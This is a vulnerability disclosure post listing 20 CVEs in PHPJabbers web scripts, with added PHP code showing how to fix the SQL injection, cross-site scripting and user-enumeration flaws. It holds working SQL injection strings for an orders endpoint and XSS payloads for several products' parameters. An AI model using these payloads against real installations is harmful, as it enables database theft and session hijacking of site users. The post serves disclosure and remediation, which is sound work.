Today, I want to follow up on the previous post (https://medium.com/@mfortinsec/multiple-vulnerabilities-in-phpjabbers-part-2-4fa5e2ccfe2e) with some additional vulnerabilities discovered through a recent collaborative security research project, run by a local group called the Atlantic CyberSecurity Collective.

Our team, consisting of a diverse and talented group of researchers, has conducted an extensive security review on the PHPJabbers collection of scripts, and during our research, we came across some significant security vulnerabilities. It’s worth mentioning that these vulnerabilities, if exploited, could potentially pose serious threats to user data and the overall integrity of these products. We submitted our findings to MITRE, a globally recognized cybersecurity standards organization. Consequently, these vulnerabilities were validated and assigned the following Common Vulnerabilities and Exposures (CVE) identifiers:

  • CVE-2023-40748
  • CVE-2023-40749
  • CVE-2023-40750
  • CVE-2023-40751
  • CVE-2023-40752
  • CVE-2023-40753
  • CVE-2023-40754
  • CVE-2023-40755
  • CVE-2023-40756
  • CVE-2023-40757
  • CVE-2023-40758
  • CVE-2023-40759
  • CVE-2023-40760
  • CVE-2023-40761
  • CVE-2023-40762
  • CVE-2023-40763
  • CVE-2023-40764
  • CVE-2023-40765
  • CVE-2023-40766
  • CVE-2023-40767

Note that we are all professionals with full-time jobs and other responsibilities. Given the sheer number of products in the PHP Jabbers lineup and the limited time available, we weren’t able to assess every single product. There is a lot of code reuse across those applications, so it would be safe to assume most of these vulnerabilities are present in other products as well.

Members of the research group conducted some additional research in PHP Jabbers products and found vulnerabilities which aren’t addressed in this disclosure.

We informed the PHP Jabbers team through their online forms, but were completely ignored. Each of our attempts at communicating these vulnerabilities was met with silence and an almost instantaneous “closed” status to our submitted tickets.

Our intentions behind sharing this information aren’t to tarnish the vendor’s reputation or stir up panic among its user base. Instead, we aim to encourage proactive and transparent collaboration within the cybersecurity community. It’s crucial to remember that we all share the same goal — enhancing the overall security of products and fostering a safer digital world for users.

In the sections to follow, we will delve into each of the identified vulnerabilities:

#1: Food Delivery Script 3.0 SQL injection (SQLi) in q parameter

(CVE-2023-40748)

Edit the q parameter of index.php. Example: pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3dcreated%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d-1910')+OR+6100%3d6100%23%26type%3d

PoC for q SQLi in Burp Repeater

#2: Food Delivery Script 3.0 SQL injection (SQLi) in column parameter

(CVE-2023-40749)

Edit the column parameter. Example: controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d’’%26type%3d

PoC for column SQLi in Burp Repeater
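For reference, here is how the two injection points above (#1 and #2) are closed on the server side. This is an added example, not PHPJabbers code: the table and column names, the MySQL LIMIT syntax and the search column are assumptions for illustration.

```php
<?php
// Added example, not PHPJabbers code: a hardened order-listing handler that
// accepts the same parameters as the disclosed requests (column, direction,
// page, rowCount, q). Table and column names are assumptions for illustration.
declare(strict_types=1);

// Identifiers cannot be bound as prepared-statement parameters, so the only
// safe fix for the column vector (#2) is a whitelist: user input selects a
// key, and the key maps to a literal that we wrote ourselves.
const ORDER_COLUMNS = ['created' => 'created', 'status' => 'status', 'total' => 'total'];

function buildOrderQuery(array $params): array
{
    $column    = ORDER_COLUMNS[(string)($params['column'] ?? '')] ?? 'created';
    $direction = strtoupper((string)($params['direction'] ?? 'ASC')) === 'DESC' ? 'DESC' : 'ASC';
    $rowCount  = max(1, min(200, (int)($params['rowCount'] ?? 50)));
    $page      = max(1, (int)($params['page'] ?? 1));
    $offset    = ($page - 1) * $rowCount;

    // The search term (the q vector in #1) is bound, never concatenated;
    // LIKE metacharacters are escaped so "%" in input cannot widen the match.
    $sql  = 'SELECT id, created, status, total FROM orders';
    $args = [];
    $q    = (string)($params['q'] ?? '');
    if ($q !== '') {
        $sql .= ' WHERE customer_name LIKE :q';
        $args[':q'] = '%' . addcslashes($q, '%_\\') . '%';
    }
    // Every interpolated piece here is either a whitelisted literal or an int.
    $sql .= " ORDER BY $column $direction LIMIT $offset, $rowCount";
    return [$sql, $args];
}

function fetchOrders(PDO $pdo, array $params): array
{
    [$sql, $args] = buildOrderQuery($params);
    $stmt = $pdo->prepare($sql);
    $stmt->execute($args);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input shaped like the disclosed requests: the column value is not
// a whitelist key, so ordering falls back to the default instead of reaching SQL,
// and the quote in q travels as a bound value rather than as query text.
[$sql, $args] = buildOrderQuery([
    'column'    => '(SELECT CASE WHEN 1=1 THEN 0 END)',
    'direction' => 'ASC', 'page' => '1', 'rowCount' => '50',
    'q'         => "-1') OR 1=1#",
]);
echo $sql, "\n";          // ORDER BY clause uses the default column
echo $args[':q'], "\n";   // the search term, wrapped in % and escaped
```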

#3: Reflected XSS in the action parameter of Yacht Listing Script

(CVE-2023-40750)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#4: Reflected XSS in the action parameter of Fundraising Script

(CVE-2023-40751)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#5: Reflected XSS in the action parameter of Make An Offer Widget

(CVE-2023-40752)

Edit the action parameter. Example: controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E

#6: Stored XSS in the message parameter of Ticket Support Script

(CVE-2023-40753)

Edit the message parameter in a notification creation request.
Example: notification_create=1&type=NewTicket&department_id%5B%5D=2&user_id%5B%5D=1&i18n%5B1%5D%5Bsubject%5D=a&i18n%5B1%5D%5Bmessage%5D=%3C%2Ftextarea%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ctextarea%3E

#7: Authenticated Account Takeover through Username/Password change in Car Rental Script

(CVE-2023-40754)

Attacker simply needs access to an authenticated account.

#8: Reflected XSS in the theme parameter of Callback Widget

(CVE-2023-40755)

Replace theme parameter value with the following payload: theme10dnel8%22%3e%3cscript%3ealert(1)%3c%2fscript%3eko0so
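All of the cross-site scripting findings above (#3 to #6 and #8) come down to a parameter being echoed into HTML unencoded. The following is an added example, not PHPJabbers code, showing output encoding for the three contexts those findings rely on; where each value is actually echoed in the real products is an assumption.

```php
<?php
// Added example, not PHPJabbers code: output encoding for the reflection
// contexts the disclosed XSS findings (#3-#6, #8) rely on. The exact place
// each value is echoed in the products is assumed; the encoding is the point.
declare(strict_types=1);

// One encoder for element text and quoted attribute values. ENT_QUOTES turns
// the '"' that opens the "> breakout in #8 into &quot;, and '<' from the
// <img onerror=...> tag in #3-#5 into &lt;.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reflected action parameter echoed into a form's action URL (assumed context):
// URL-encode for the query string, then HTML-encode for the attribute.
function renderAdminForm(string $controller, string $action): string
{
    return '<form method="post" action="index.php?controller=' . h(rawurlencode($controller))
         . '&amp;action=' . h(rawurlencode($action)) . '">';
}

// Stored notification message re-displayed inside a textarea (#6). Textarea
// content is raw text, so an unencoded </textarea> ends the element; with h()
// the '<' becomes &lt; and the breakout stays inert text.
function renderMessageEditor(string $savedMessage): string
{
    return '<textarea name="message">' . h($savedMessage) . '</textarea>';
}

// Theme parameter landing in a quoted attribute (assumed context for #8).
function renderBody(string $theme): string
{
    return '<body class="theme-' . h($theme) . '">';
}

// Constructed inputs that mimic the disclosed payloads. In every rendered string
// the injected '<', '>' and '"' appear only as entities, so no tag or attribute
// boundary is crossed.
echo renderAdminForm('pjAdmin', '<img src=x onerror=prompt()>'), "\n";
echo renderMessageEditor('</textarea><script>alert(1);</script><textarea>'), "\n";
echo renderBody('theme10"><script>alert(1)</script>'), "\n";
```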

#9: User Enumeration through “Forgot Password” in Callback Widget

(CVE-2023-40756)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#10: User Enumeration through “Forgot Password” in Food Delivery Script

(CVE-2023-40757)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#11: User Enumeration through “Forgot Password” in Document Creator

(CVE-2023-40758)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#12: User Enumeration through “Forgot Password” in Restaurant Booking System

(CVE-2023-40759)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#13: User Enumeration through “Forgot Password” in Hotel Booking System

(CVE-2023-40760)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#14: User Enumeration through “Forgot Password” in Yacht Listing Script

(CVE-2023-40761)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#15: User Enumeration through “Forgot Password” in Fundraising Script

(CVE-2023-40762)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#16: User Enumeration through “Forgot Password” in Taxi Booking Script

(CVE-2023-40763)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#17: User Enumeration through “Forgot Password” in Car Rental Script

(CVE-2023-40764)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#18: User Enumeration through “Forgot Password” in Event Booking Calendar

(CVE-2023-40765)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#19: User Enumeration through “Forgot Password” in Ticket Support Script

(CVE-2023-40766)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.

#20: User Enumeration through “Forgot Password” in Make An Offer Widget

(CVE-2023-40767)

The response to a “Forgot Password” request reveals whether the submitted username/email address is registered on the system.
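The twelve enumeration findings (#9 to #20) share one root cause, so one fix pattern applies to all of them: the “Forgot Password” handler must look and behave the same whether or not the address exists. The following is an added example, not PHPJabbers code; the table names, token storage and the mailer callback are assumptions, and the demo runs on an in-memory SQLite database with constructed data.

```php
<?php
// Added example, not PHPJabbers code: a "forgot password" handler whose
// visible behaviour is the same whether or not the address is registered,
// which is what #9-#20 lack. Table names, token storage and the mailer
// callback are assumptions for illustration.
declare(strict_types=1);

const RESET_MESSAGE = 'If an account exists for that address, a password reset link has been sent.';

function requestPasswordReset(PDO $pdo, callable $sendMail, string $email): string
{
    $stmt = $pdo->prepare('SELECT id FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $userId = $stmt->fetchColumn();

    if ($userId !== false) {
        // Only the hash of the token is stored; the raw token goes to the mailbox.
        $token = bin2hex(random_bytes(32));
        $ins = $pdo->prepare('INSERT INTO password_resets (user_id, token_hash, expires_at) VALUES (:uid, :hash, :exp)');
        $ins->execute([':uid' => $userId, ':hash' => hash('sha256', $token), ':exp' => time() + 900]);
        $sendMail($email, $token);
    } else {
        // Do comparable work so the unknown-address path is not visibly faster.
        // Queueing the mail and replying before it is sent removes the rest of
        // the timing difference; that part is out of scope for this snippet.
        hash('sha256', bin2hex(random_bytes(32)));
    }
    // Same text and same HTTP status for both branches: nothing to enumerate.
    return RESET_MESSAGE;
}

// Demo on an in-memory SQLite database with constructed sample data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)');
$pdo->exec("INSERT INTO users (email) VALUES ('alice@example.com')");
$pdo->exec('CREATE TABLE password_resets (user_id INTEGER, token_hash TEXT, expires_at INTEGER)');

$sent = [];
$mailer = function (string $to, string $token) use (&$sent): void { $sent[] = $to; };

$known   = requestPasswordReset($pdo, $mailer, 'alice@example.com');
$unknown = requestPasswordReset($pdo, $mailer, 'nobody@example.com');
var_dump($known === $unknown);   // the caller cannot tell the two requests apart
var_dump($sent);                 // only the registered address was mailed
```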
